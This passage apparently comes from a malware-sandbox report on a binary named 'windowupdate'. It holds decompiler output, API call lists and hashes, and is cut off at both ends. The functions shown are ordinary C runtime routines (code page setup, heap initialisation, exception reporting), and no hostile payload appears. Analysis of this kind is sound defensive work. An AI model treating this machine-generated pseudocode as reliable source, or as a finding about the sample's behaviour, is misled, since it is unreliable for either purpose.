                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: TimevecTimevec::___wcstombs_lstd::_
                      • String ID: minkernel\crts\ucrt\src\appcrt\mbstring\mbctype.cpp
                      • API String ID: 2681442900-426720447
                      • Opcode ID: 4b96bfeb63b6be63a6bfc98d7eb5af631a8b54d91595c3fbdbe3872b27f2b937
                      • Instruction ID: 3da7ed6e3e1119d444f34af02f28a522fe9ecf832f640e456a7e9eae5d9b9b7b
                      • Opcode Fuzzy Hash: 4b96bfeb63b6be63a6bfc98d7eb5af631a8b54d91595c3fbdbe3872b27f2b937
                      • Instruction Fuzzy Hash: 03513F71900209ABCB04EF64C8929EE7775FF55314F2445A8F515AB292EB31EE05DFB0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      C-Code - Quality: 97%
                      			E00D9F5F0(void* __edi, signed int _a4) {
                      				signed int _v8;
                      				char _v264;
                      				char _v520;
                      				char _v776;
                      				char _v1800;
                      				struct _cpinfo _v1820;
                      				signed int _v1824;
                      				signed int _v1828;
                      				signed int _t121;
                      				signed int _t149;
                      				signed int _t151;
                      				void* _t153;
                      				signed int _t157;
                      				signed int _t173;
                      				signed int _t175;
                      				signed int _t182;
                      				signed int _t201;
                      				signed int _t209;
                      				void* _t211;
                      				void* _t212;
                      				signed int _t213;
                      
                      				_t211 = __edi;
                      				_t121 =  *0xdf600c; // 0x71e60372
                      				_v8 = _t121 ^ _t213;
                      				_t123 = _a4;
                      				if( *(_a4 + 4) == 0xfde9) {
                      					L25:
                      					_v1824 = 0;
                      					while(1) {
                      						__eflags = _v1824 - 0x100;
                      						if(_v1824 >= 0x100) {
                      							goto L36;
                      						}
                      						__eflags = _v1824 - 0x41;
                      						if(_v1824 < 0x41) {
                      							L31:
                      							__eflags = _v1824 - 0x61;
                      							if(_v1824 < 0x61) {
                      								L34:
                      								_t123 = _a4 + _v1824;
                      								__eflags = _t123;
                      								 *((char*)(_t123 + 0x119)) = 0;
                      							} else {
                      								__eflags = _v1824 - 0x7a;
                      								if(_v1824 > 0x7a) {
                      									goto L34;
                      								} else {
                      									_t123 = _a4 + _v1824;
                      									 *(_a4 + _v1824 + 0x19) =  *(_a4 + _v1824 + 0x19) & 0x000000ff | 0x00000020;
                      									_t187 = _a4 + _v1824;
                      									 *((char*)(_a4 + _v1824 + 0x119)) = _v1824 - 0x20;
                      								}
                      							}
                      						} else {
                      							__eflags = _v1824 - 0x5a;
                      							if(_v1824 > 0x5a) {
                      								goto L31;
                      							} else {
                      								 *(_a4 + _v1824 + 0x19) =  *(_a4 + _v1824 + 0x19) & 0x000000ff | 0x00000010;
                      								_t187 = _v1824 + 0x20;
                      								_t123 = _a4 + _v1824;
                      								 *((char*)(_a4 + _v1824 + 0x119)) = _v1824 + 0x20;
                      							}
                      						}
                      						_t157 = _v1824 + 1;
                      						__eflags = _t157;
                      						_v1824 = _t157;
                      					}
                      				} else {
                      					_t187 = _a4;
                      					if(GetCPInfo( *(_a4 + 4),  &_v1820) == 0) {
                      						goto L25;
                      					} else {
                      						_v1824 = 0;
                      						while(_v1824 < 0x100) {
                      							 *((char*)(_t213 + _v1824 - 0x104)) = _v1824;
                      							_v1824 = _v1824 + 1;
                      						}
                      						 *((char*)(_t213 + 0xfffffffffffffefc)) = 0x20;
                      						_v1828 = _t213 + 0xfffffffffffff8ee;
                      						while(1) {
                      							__eflags =  *_v1828 & 0x000000ff;
                      							if(__eflags == 0) {
                      								break;
                      							}
                      							_v1824 =  *_v1828 & 0x000000ff;
                      							while(1) {
                      								_t149 = _v1828;
                      								__eflags = _v1824 - ( *(_t149 + 1) & 0x000000ff);
                      								if(_v1824 > ( *(_t149 + 1) & 0x000000ff)) {
                      									break;
                      								}
                      								__eflags = _v1824 - 0x100;
                      								if(_v1824 < 0x100) {
                      									 *((char*)(_t213 + _v1824 - 0x104)) = 0x20;
                      									_t209 = _v1824 + 1;
                      									__eflags = _t209;
                      									_v1824 = _t209;
                      									continue;
                      								}
                      								break;
                      							}
                      							_t151 = _v1828 + 2;
                      							__eflags = _t151;
                      							_v1828 = _t151;
                      						}
                      						E00DA5170(_t153, _t211, _t212, __eflags, 0, 1,  &_v264, 0x100,  &_v1800,  *(_a4 + 4), 0);
                      						E00DA8FB0(_t153, _t212, 0,  *((intOrPtr*)(_a4 + 0x21c)), 0x100,  &_v264, 0x100,  &_v520, 0x100,  *(_a4 + 4), 0); // executed
                      						_t187 = _a4;
                      						_t123 = E00DA8FB0(_t153, _t212, 0,  *((intOrPtr*)(_a4 + 0x21c)), 0x200,  &_v264, 0x100,  &_v776, 0x100,  *(_a4 + 4), 0);
                      						_v1824 = 0;
                      						while(1) {
                      							__eflags = _v1824 - 0x100;
                      							if(_v1824 >= 0x100) {
                      								break;
                      							}
                      							_t201 = _v1824;
                      							__eflags =  *(_t213 + _t201 * 2 - 0x704) & 1;
                      							if(( *(_t213 + _t201 * 2 - 0x704) & 1) == 0) {
                      								_t173 = _v1824;
                      								_t187 =  *(_t213 + _t173 * 2 - 0x704) & 2;
                      								__eflags =  *(_t213 + _t173 * 2 - 0x704) & 2;
                      								if(( *(_t213 + _t173 * 2 - 0x704) & 2) == 0) {
                      									_t123 = _a4 + _v1824;
                      									__eflags = _t123;
                      									 *((char*)(_t123 + 0x119)) = 0;
                      								} else {
                      									 *(_a4 + _v1824 + 0x19) =  *(_a4 + _v1824 + 0x19) & 0x000000ff | 0x00000020;
                      									_t123 = _a4 + _v1824;
                      									_t182 = _v1824;
                      									_t187 =  *((intOrPtr*)(_t213 + _t182 - 0x304));
                      									 *((char*)(_a4 + _v1824 + 0x119)) =  *((intOrPtr*)(_t213 + _t182 - 0x304));
                      								}
                      							} else {
                      								 *(_a4 + _v1824 + 0x19) =  *(_a4 + _v1824 + 0x19) & 0x000000ff | 0x00000010;
                      								_t187 = _v1824;
                      								_t123 =  *((intOrPtr*)(_t213 + _t187 - 0x204));
                      								 *((char*)(_a4 + _v1824 + 0x119)) =  *((intOrPtr*)(_t213 + _t187 - 0x204));
                      							}
                      							_t175 = _v1824 + 1;
                      							__eflags = _t175;
                      							_v1824 = _t175;
                      						}
                      					}
                      				}
                      				L36:
                      				__eflags = _v8 ^ _t213;
                      				return E00D47280(_t123, _t153, _v8 ^ _t213, _t187, _t211, _t212);
                      			}

























                      APIs
                      • GetCPInfo.KERNEL32(0000FDE9,?), ref: 00D9F623
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Info
                      • String ID: $z
                      • API String ID: 1807457897-2251613814
                      • Opcode ID: c5b13576709cb128da8d15ed5e72e3de3ed71ba0271978d4fc7095b91bc9eb5f
                      • Instruction ID: bd7e713f306a8de8325b8e138b54db9b0cf253715bc546c4bbfe07b1ec553480
                      • Opcode Fuzzy Hash: c5b13576709cb128da8d15ed5e72e3de3ed71ba0271978d4fc7095b91bc9eb5f
                      • Instruction Fuzzy Hash: 99A12074E4825C9FDF25CF48C891BE9BB71EF54304F1481E9D94D9B282C274AA91CFA4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      C-Code - Quality: 95%
                      			E00D9FE00(void* __ebx, void* __ecx, int __edx, void* __edi, void* __eflags, int _a4, int _a8) {
                      				signed int _v8;
                      				char _v22;
                      				struct _cpinfo _v28;
                      				signed int _v32;
                      				signed int _v36;
                      				signed int _v40;
                      				signed int _v44;
                      				signed char* _v48;
                      				void* __esi;
                      				signed int _t169;
                      				signed int _t172;
                      				signed int _t175;
                      				intOrPtr _t183;
                      				signed char* _t186;
                      				signed int _t190;
                      				signed int _t194;
                      				signed int _t228;
                      				signed int _t237;
                      				signed int _t251;
                      				signed int _t256;
                      				signed char* _t271;
                      				signed char* _t282;
                      				signed int _t283;
                      				signed int _t287;
                      				signed int _t291;
                      				signed int _t293;
                      				void* _t294;
                      				signed int _t296;
                      				void* _t297;
                      				void* _t298;
                      
                      				_t294 = __edi;
                      				_t261 = __edx;
                      				_t220 = __ebx;
                      				_t169 =  *0xdf600c; // 0x71e60372
                      				_v8 = _t169 ^ _t296;
                      				_t172 = E00D9F410(__ebx, _t295, __eflags, _a4);
                      				_t298 = _t297 + 4;
                      				_a4 = _t172;
                      				if(_a4 != 0) {
                      					_v44 = 0;
                      					while(1) {
                      						__eflags = _v44 - 5;
                      						if(_v44 >= 5) {
                      							break;
                      						}
                      						_t172 = _v44 * 0x30;
                      						_t11 = _t172 + 0xdf6458; // 0x21827982
                      						__eflags =  *_t11 - _a4;
                      						if( *_t11 != _a4) {
                      							_t261 = _v44 + 1;
                      							__eflags = _t261;
                      							_v44 = _t261;
                      							continue;
                      						} else {
                      							_v32 = 0;
                      							while(1) {
                      								__eflags = _v32 - 0x101;
                      								if(_v32 >= 0x101) {
                      									break;
                      								}
                      								 *((char*)(_a8 + _v32 + 0x18)) = 0;
                      								_t293 = _v32 + 1;
                      								__eflags = _t293;
                      								_v32 = _t293;
                      							}
                      							_v36 = 0;
                      							while(1) {
                      								__eflags = _v36 - 4;
                      								if(_v36 >= 4) {
                      									break;
                      								}
                      								_t27 = _v36 * 8; // 0xdf646d
                      								_v40 = _v44 * 0x30 + _t27 + 0xdf6468;
                      								while(1) {
                      									_t282 = _v40;
                      									__eflags =  *_t282 & 0x000000ff;
                      									if(( *_t282 & 0x000000ff) == 0) {
                      										break;
                      									}
                      									_t283 = _v40;
                      									__eflags =  *(_t283 + (1 << 0)) & 0x000000ff;
                      									if(( *(_t283 + (1 << 0)) & 0x000000ff) != 0) {
                      										_v32 =  *_v40 & 0x000000ff;
                      										while(1) {
                      											_t256 = _v40;
                      											__eflags = _v32 - ( *(_t256 + (1 << 0)) & 0x000000ff);
                      											if(_v32 > ( *(_t256 + (1 << 0)) & 0x000000ff)) {
                      												break;
                      											}
                      											__eflags = _v32 - 0x100;
                      											if(_v32 < 0x100) {
                      												_t46 = _v36 + 0xdf6450; // 0x0
                      												 *(_a8 + _v32 + 0x19) =  *(_a8 + _v32 + 0x19) & 0x000000ff |  *_t46;
                      												_t291 = _v32 + 1;
                      												__eflags = _t291;
                      												_v32 = _t291;
                      												continue;
                      											}
                      											break;
                      										}
                      										_t287 = _v40 + 2;
                      										__eflags = _t287;
                      										_v40 = _t287;
                      										continue;
                      									}
                      									break;
                      								}
                      								_t251 = _v36 + 1;
                      								__eflags = _t251;
                      								_v36 = _t251;
                      							}
                      							 *(_a8 + 4) = _a4;
                      							 *((intOrPtr*)(_a8 + 8)) = 1;
                      							_t261 = _a8;
                      							 *((intOrPtr*)(_a8 + 0x21c)) = E00D9F350(_a8,  *(_a8 + 4));
                      							_v36 = 0;
                      							while(1) {
                      								__eflags = _v36 - 6;
                      								if(_v36 >= 6) {
                      									break;
                      								}
                      								_t71 = _v36 * 2; // 0x0
                      								 *((short*)(_a8 + 0xc + _v36 * 2)) =  *((intOrPtr*)(_v44 * 0x30 + _t71 + 0xdf645c));
                      								_t261 = _v36 + 1;
                      								__eflags = _t261;
                      								_v36 = _t261;
                      							}
                      							E00D9F5F0(_t294, _a8);
                      							_t173 = 0;
                      						}
                      						goto L73;
                      					}
                      					__eflags = _a4;
                      					if(_a4 == 0) {
                      						L33:
                      						_t173 = _t172 | 0xffffffff;
                      					} else {
                      						__eflags = _a4 - 0xfde8;
                      						if(_a4 == 0xfde8) {
                      							goto L33;
                      						} else {
                      							_t261 = _a4 & 0x0000ffff;
                      							_t172 = IsValidCodePage(_a4 & 0x0000ffff);
                      							__eflags = _t172;
                      							if(_t172 != 0) {
                      								__eflags = _a4 - 0xfde9;
                      								if(_a4 != 0xfde9) {
                      									_t261 = _a4;
                      									_t175 = GetCPInfo(_a4,  &_v28);
                      									__eflags = _t175;
                      									if(_t175 == 0) {
                      										__eflags =  *0xf2152c;
                      										if( *0xf2152c == 0) {
                      											_t173 = _t175 | 0xffffffff;
                      											__eflags = _t175 | 0xffffffff;
                      										} else {
                      											E00D9F510( &_v28, _a8);
                      											_t173 = 0;
                      										}
                      									} else {
                      										_v32 = 0;
                      										while(1) {
                      											__eflags = _v32 - 0x101;
                      											if(_v32 >= 0x101) {
                      												break;
                      											}
                      											 *((char*)(_a8 + _v32 + 0x18)) = 0;
                      											_t194 = _v32 + 1;
                      											__eflags = _t194;
                      											_v32 = _t194;
                      										}
                      										 *(_a8 + 4) = _a4;
                      										 *((intOrPtr*)(_a8 + 0x21c)) = 0;
                      										__eflags = _v28 - 2;
                      										if(_v28 != 2) {
                      											 *((intOrPtr*)(_a8 + 8)) = 0;
                      										} else {
                      											_v48 =  &_v22;
                      											while(1) {
                      												_t229 = _v48;
                      												__eflags =  *_v48 & 0x000000ff;
                      												if(( *_v48 & 0x000000ff) == 0) {
                      													break;
                      												}
                      												_t186 = _v48;
                      												_t229 =  *(_t186 + 1) & 0x000000ff;
                      												__eflags =  *(_t186 + 1) & 0x000000ff;
                      												if(( *(_t186 + 1) & 0x000000ff) != 0) {
                      													_v32 =  *_v48 & 0x000000ff;
                      													while(1) {
                      														_t271 = _v48;
                      														__eflags = _v32 - ( *(_t271 + 1) & 0x000000ff);
                      														if(_v32 > ( *(_t271 + 1) & 0x000000ff)) {
                      															break;
                      														}
                      														 *(_a8 + _v32 + 0x19) =  *(_a8 + _v32 + 0x19) & 0x000000ff | 0x00000004;
                      														_t237 = _v32 + 1;
                      														__eflags = _t237;
                      														_v32 = _t237;
                      													}
                      													_t190 =  &(_v48[2]);
                      													__eflags = _t190;
                      													_v48 = _t190;
                      													continue;
                      												}
                      												break;
                      											}
                      											_v32 = 1;
                      											while(1) {
                      												__eflags = _v32 - 0xff;
                      												if(_v32 >= 0xff) {
                      													break;
                      												}
                      												 *(_a8 + _v32 + 0x19) =  *(_a8 + _v32 + 0x19) & 0x000000ff | 0x00000008;
                      												_t229 = _v32 + 1;
                      												__eflags = _t229;
                      												_v32 = _t229;
                      											}
                      											_t183 = E00D9F350(_t229,  *(_a8 + 4));
                      											_t298 = _t298 + 4;
                      											 *((intOrPtr*)(_a8 + 0x21c)) = _t183;
                      											 *((intOrPtr*)(_a8 + 8)) = 1;
                      										}
                      										_v36 = 0;
                      										while(1) {
                      											__eflags = _v36 - 6;
                      											if(_v36 >= 6) {
                      												break;
                      											}
                      											 *((short*)(_a8 + 0xc + _v36 * 2)) = 0;
                      											_t228 = _v36 + 1;
                      											__eflags = _t228;
                      											_v36 = _t228;
                      										}
                      										_t261 = _a8;
                      										E00D9F5F0(_t294, _a8); // executed
                      										_t173 = 0;
                      									}
                      								} else {
                      									 *(_a8 + 4) = 0xfde9;
                      									 *((intOrPtr*)(_a8 + 0x21c)) = 0;
                      									_v32 = 0;
                      									while(1) {
                      										__eflags = _v32 - 6;
                      										if(_v32 >= 6) {
                      											break;
                      										}
                      										 *((char*)(_a8 + _v32 + 0x18)) = 0;
                      										_t261 = _v32 + 1;
                      										__eflags = _t261;
                      										_v32 = _t261;
                      									}
                      									 *((intOrPtr*)(_a8 + 8)) = 0;
                      									_v36 = 0;
                      									while(1) {
                      										__eflags = _v36 - 6;
                      										if(_v36 >= 6) {
                      											break;
                      										}
                      										 *((short*)(_a8 + 0xc + _v36 * 2)) = 0;
                      										_t261 = _v36 + 1;
                      										__eflags = _t261;
                      										_v36 = _t261;
                      									}
                      									E00D9F5F0(_t294, _a8);
                      									_t173 = 0;
                      								}
                      							} else {
                      								goto L33;
                      							}
                      						}
                      					}
                      				} else {
                      					E00D9F510(_a8, _a8);
                      					_t173 = 0;
                      				}
                      				L73:
                      				return E00D47280(_t173, _t220, _v8 ^ _t296, _t261, _t294, _t295);
                      			}

                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bb9a7dbeea5aa84dd153f1e5ae82c2faff00ad6bf30143ad46fd03cc6a27f93b
                      • Instruction ID: 8be03ccbe1c2703a526b238b74d840790205ffa246e6ab5d4cb8b97fe0fbe455
                      • Opcode Fuzzy Hash: bb9a7dbeea5aa84dd153f1e5ae82c2faff00ad6bf30143ad46fd03cc6a27f93b
                      • Instruction Fuzzy Hash: 77D12774904209DBDF04CF94C494AEEBBB1FF49314F24C16AE856AB242D339EA45DFA4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      control_flow_graph 461 d48740-d48768 call d48b80 call d8d790 call dbf790 467 d4876d-d48770 461->467
                      C-Code - Quality: 100%
                      			E00D48740() {
                      				signed int _v8;
                      				intOrPtr _v12;
                      				void* _t8;
                      				void* _t9;
                      				void* _t12;
                      				void* _t13;
                      				void* _t14;
                      
                      				_v8 = E00D48B80() & 0x0000ffff;
                      				_v12 = E00D8D790();
                      				_t8 = E00DBF790(_t9, _t12, _t13, _t14, 0xd30000, 0, _v12, _v8); // executed
                      				return _t8;
                      			}

                      APIs
                      • ___scrt_get_show_window_mode.LIBCMTD ref: 00D48746
                        • Part of subcall function 00D48B80: GetStartupInfoW.KERNEL32(?), ref: 00D48B9A
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: InfoStartup___scrt_get_show_window_mode
                      • String ID:
                      • API String ID: 2456344720-0
                      • Opcode ID: 6f4411ee381458242b3026e17ca601a37bad00a078043657ebcd81e73d239ef5
                      • Instruction ID: c9240fe085fc0afd9abc883629322545f798d06d7ac8fe09da5f4cd933e79bc8
                      • Opcode Fuzzy Hash: 6f4411ee381458242b3026e17ca601a37bad00a078043657ebcd81e73d239ef5
                      • Instruction Fuzzy Hash: 36D017B9904208BBCB00FBE89D02BAEBBB9DB84711F108199B54897281D9305A0057F1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 41%
                      			E00D46AF9() {
                      				int _t1;
                      				intOrPtr _t2;
                      				void* _t4;
                      				intOrPtr _t9;
                      				void* _t13;
                      				intOrPtr* _t16;
                      
                      				_t1 = IsProcessorFeaturePresent(0xc);
                      				if(_t1 != 0) {
                      					_t16 =  *[fs:0x30] + 0x34;
                      					_t2 =  *_t16;
                      					if(_t2 != 0) {
                      						L7:
                      						 *0xf20208 = _t2;
                      						_t4 = 1;
                      					} else {
                      						_t4 = HeapAlloc(GetProcessHeap(), 8, 8);
                      						_t13 = _t4;
                      						if(_t13 != 0) {
                      							__imp__InitializeSListHead(_t13);
                      							asm("lock cmpxchg [esi], ecx");
                      							if(0 != 0) {
                      								HeapFree(GetProcessHeap(), 0, _t13);
                      							}
                      							_t2 =  *_t16;
                      							goto L7;
                      						}
                      					}
                      					return _t4;
                      				} else {
                      					_t9 = _t1 + 1;
                      					 *0xf20208 = _t9;
                      					return _t9;
                      				}
                      			}

                      APIs
                      • IsProcessorFeaturePresent.KERNEL32(0000000C,00D469F5,00000000,?,00D46BAD,?,?,00D34CBB), ref: 00D46AFB
                      • GetProcessHeap.KERNEL32(00000008,00000008,00000000,00000000,?,00D46BAD,?,?,00D34CBB), ref: 00D46B22
                      • HeapAlloc.KERNEL32(00000000,?,00D46BAD,?,?,00D34CBB), ref: 00D46B29
                      • InitializeSListHead.KERNEL32(00000000,?,00D46BAD,?,?,00D34CBB), ref: 00D46B36
                      • GetProcessHeap.KERNEL32(00000000,00000000,?,00D46BAD,?,?,00D34CBB), ref: 00D46B4B
                      • HeapFree.KERNEL32(00000000,?,00D46BAD,?,?,00D34CBB), ref: 00D46B52
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Heap$Process$AllocFeatureFreeHeadInitializeListPresentProcessor
                      • String ID:
                      • API String ID: 1475849761-0
                      • Opcode ID: af3b593e2caeeee3f96144fa94f478e021c0277965f9f399e71628363eb0f11b
                      • Instruction ID: 761a21908319eb310c71a283e9ea4aa9e51c5aebb04af1849797a3223a17cf95
                      • Opcode Fuzzy Hash: af3b593e2caeeee3f96144fa94f478e021c0277965f9f399e71628363eb0f11b
                      • Instruction Fuzzy Hash: 20F04F726407039BD7619F79AC0CF1677A9FFA5B16F184429FA82D3350EB30C8019A71
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 85%
                      			E00D48A40(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
                      				char _v0;
                      				void* _v5;
                      				signed char _v6;
                      				long _v12;
                      				struct _EXCEPTION_POINTERS _v20;
                      				intOrPtr _v88;
                      				char _v96;
                      				char _v100;
                      				intOrPtr _v616;
                      				char* _v620;
                      				void* _v624;
                      				intOrPtr _v628;
                      				char _v632;
                      				intOrPtr _v636;
                      				intOrPtr _v640;
                      				intOrPtr _v644;
                      				intOrPtr _v648;
                      				intOrPtr _v652;
                      				intOrPtr _v656;
                      				intOrPtr _v660;
                      				intOrPtr _v664;
                      				intOrPtr _v668;
                      				intOrPtr _v672;
                      				intOrPtr _v676;
                      				char _v816;
                      				long _t51;
                      				intOrPtr _t53;
                      				intOrPtr _t54;
                      				intOrPtr _t59;
                      				intOrPtr _t64;
                      				intOrPtr _t65;
                      
                      				_t65 = __esi;
                      				_t64 = __edi;
                      				_t59 = __edx;
                      				_t53 = __ebx;
                      				if(IsProcessorFeaturePresent(0x17) != 0) {
                      					_t54 = _a4;
                      					asm("int 0x29");
                      				}
                      				_push(3);
                      				E00D48D10(_t41);
                      				_v640 = E00D4AF80(_t64,  &_v816, 0, 0x2cc);
                      				_v644 = _t54;
                      				_v648 = _t59;
                      				_v652 = _t53;
                      				_v656 = _t65;
                      				_v660 = _t64;
                      				_v616 = ss;
                      				_v628 = cs;
                      				_v664 = ds;
                      				_v668 = es;
                      				_v672 = fs;
                      				_v676 = gs;
                      				asm("pushfd");
                      				_pop( *_t15);
                      				_v816 = 0x10001;
                      				_v632 = _v0;
                      				_v620 =  &_v0;
                      				_v636 =  *((intOrPtr*)( &_v0 - 4));
                      				E00D4AF80(_t64,  &_v100, 0, 0x50);
                      				_v100 = 0x40000015;
                      				_v96 = 1;
                      				_v88 = _v0;
                      				if(IsDebuggerPresent() != 1) {
                      					_v5 = 0;
                      				} else {
                      					_v5 = 1;
                      				}
                      				_v6 = _v5;
                      				_v20.ExceptionRecord =  &_v100;
                      				_v20.ContextRecord =  &_v816;
                      				SetUnhandledExceptionFilter(0);
                      				_t51 = UnhandledExceptionFilter( &_v20);
                      				_v12 = _t51;
                      				if(_v12 == 0 && (_v6 & 0x000000ff) == 0) {
                      					_push(3);
                      					return E00D48D10(_t51);
                      				}
                      				return _t51;
                      			}

                      APIs
                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D48A4B
                      • IsDebuggerPresent.KERNEL32 ref: 00D48B1B
                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D48B47
                      • UnhandledExceptionFilter.KERNEL32(00000007), ref: 00D48B51
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                      • String ID:
                      • API String ID: 254469556-0
                      • Opcode ID: 25654dbecc44f88314ff08e743423498d2b43c08bf5946c0a4e12ff86d1a44c4
                      • Instruction ID: 0be557a8698945529ba055754abbd31c42fa236d6c2a2d325a451b24fefe5140
                      • Opcode Fuzzy Hash: 25654dbecc44f88314ff08e743423498d2b43c08bf5946c0a4e12ff86d1a44c4
                      • Instruction Fuzzy Hash: C63136B8C053299BEF11DF60D8497DDBBB4EF18301F148199E80C6A281EB715A88CF61
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00D575A0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                      				signed int _v5;
                      				char _v16;
                      				intOrPtr _v20;
                      				char _v28;
                      				char _v32;
                      				intOrPtr _v36;
                      				intOrPtr _v40;
                      				intOrPtr _v44;
                      				signed int _v48;
                      				signed int _v52;
                      				signed int _v56;
                      				signed int _v60;
                      				signed int _v64;
                      				intOrPtr _v68;
                      				intOrPtr _v72;
                      				intOrPtr _v76;
                      				intOrPtr _v80;
                      				char _v88;
                      				signed int _v92;
                      				char _v96;
                      				signed int _v100;
                      				char _v104;
                      				signed int _v108;
                      				char _v112;
                      				signed int _v116;
                      				char _v120;
                      				char _v128;
                      				char _v136;
                      				char _v144;
                      				char _v152;
                      				char _v160;
                      				char _v168;
                      				char _v176;
                      				char _v184;
                      				char _v192;
                      				char _v200;
                      				char _v208;
                      				char _v216;
                      				char _v224;
                      				char _v232;
                      				char _v240;
                      				char _v248;
                      				char _v256;
                      				char _v264;
                      				char _v272;
                      				char _v280;
                      				char _v288;
                      				char _v296;
                      				char _v304;
                      				char _v312;
                      				char _v320;
                      				char _v328;
                      				signed int _t131;
                      				signed int _t142;
                      				signed int _t144;
                      				intOrPtr _t145;
                      				signed int _t149;
                      				intOrPtr _t153;
                      				void* _t177;
                      				void* _t180;
                      				void* _t185;
                      				signed int _t201;
                      				signed int _t205;
                      				signed int _t226;
                      				signed int _t229;
                      				void* _t243;
                      				void* _t244;
                      				void* _t245;
                      
                      				_t244 = __esi;
                      				_t243 = __edi;
                      				_t185 = __ebx;
                      				E00D4F3F0( &_v16);
                      				_v5 = 0;
                      				while(E00D5AB70( &_v16) == 0) {
                      					_t142 =  *0xf20640; // 0x0
                      					if( *_t142 == 0) {
                      						break;
                      					}
                      					_t229 =  *0xf20640; // 0x0
                      					if( *_t229 == 0x40) {
                      						break;
                      					}
                      					if(( *0xf2064c & 0x000000ff) == 0) {
                      						L7:
                      						_t144 = E00D5A560( &_v16);
                      						if(_t144 == 0) {
                      							_v96 = E00D50060("::", 2);
                      							_v92 = _t229;
                      							_t177 = E00D4FAA0( &_v136,  &_v96,  &_v16);
                      							_t245 = _t245 + 0x14;
                      							E00D4F820( &_v16, _t177);
                      							if((_v5 & 0x000000ff) != 0) {
                      								_t180 = E00D4FAD0( &_v144, 0x5b,  &_v16);
                      								_t245 = _t245 + 0xc;
                      								E00D4F820( &_v16, _t180);
                      								_v5 = 0;
                      							}
                      						}
                      						_t201 =  *0xf20640; // 0x0
                      						if( *_t201 != 0x3f) {
                      							_t145 = E00D5A1E0(_t185, _t243, _t244,  &_v296, 1, 0);
                      							_t245 = _t245 + 0xc;
                      							_v72 = _t145;
                      							E00D4F820( &_v16, E00D4FB70(_v72,  &_v304,  &_v16));
                      							goto L41;
                      						} else {
                      							_t149 =  *0xf20640; // 0x0
                      							 *0xf20640 = _t149 + 1;
                      							_t205 =  *0xf20640; // 0x0
                      							_v20 =  *_t205;
                      							_v20 = _v20 - 0x24;
                      							if(_v20 > 0x2d) {
                      								L38:
